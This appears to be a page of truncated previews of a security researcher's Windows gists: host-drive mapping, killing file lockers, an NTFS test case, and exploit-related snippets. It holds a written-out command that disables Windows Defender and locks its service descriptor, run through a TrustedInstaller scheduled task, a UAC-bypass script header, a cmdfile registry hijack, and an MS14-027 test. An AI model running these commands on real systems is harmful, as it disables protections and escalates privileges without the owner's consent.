View map_host_drive.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Param( | |
[Parameter(Mandatory, Position = 0)] | |
[string]$HostDrive, | |
[Parameter(Mandatory, Position = 1)] | |
[string]$LocalDrive | |
) | |
# Script to map a host drive inside a Windows Docker Server Container | |
# You need to be an admin in the container for this to work. | |
# Use as .\map_host_drive C: X: |
View doh.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |
View kill_file_locker.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Import-Module NtObjectManager | |
<# | |
Function to kill all processes which are using a locked file. | |
#> | |
function Kill-FileLocker { | |
param( | |
[Parameter(Mandatory)] | |
[string]$Path | |
) |
View bypass_uac.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Powershell script to bypass UAC on Vista+ assuming | |
# there exists one elevated process on the same desktop. | |
# Technical details in: | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
# You need to Install-Module NtObjectManager for this to run. | |
Import-Module NtObjectManager |
View ntfs_testcase.cpp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <tchar.h> | |
#include <Windows.h> | |
#include <string> | |
int _tmain(int argc, _TCHAR* argv[]) | |
{ | |
for (int i = 1; i < 128; ++i) | |
{ | |
std::wstring name = L".\a"; |
View cmdfile registration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\cmdfile\shell\open\command] | |
@="c:\\windows\\system32\\calc.exe" |
View Test for MS14-027
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <tchar.h> | |
#include <Windows.h> | |
int wmain(int argc, WCHAR* argv[]) | |
{ | |
if (argc < 2) | |
{ | |
printf("Usage: ImpersonateSHExec filename [sessionid]\n"); | |
return 1; |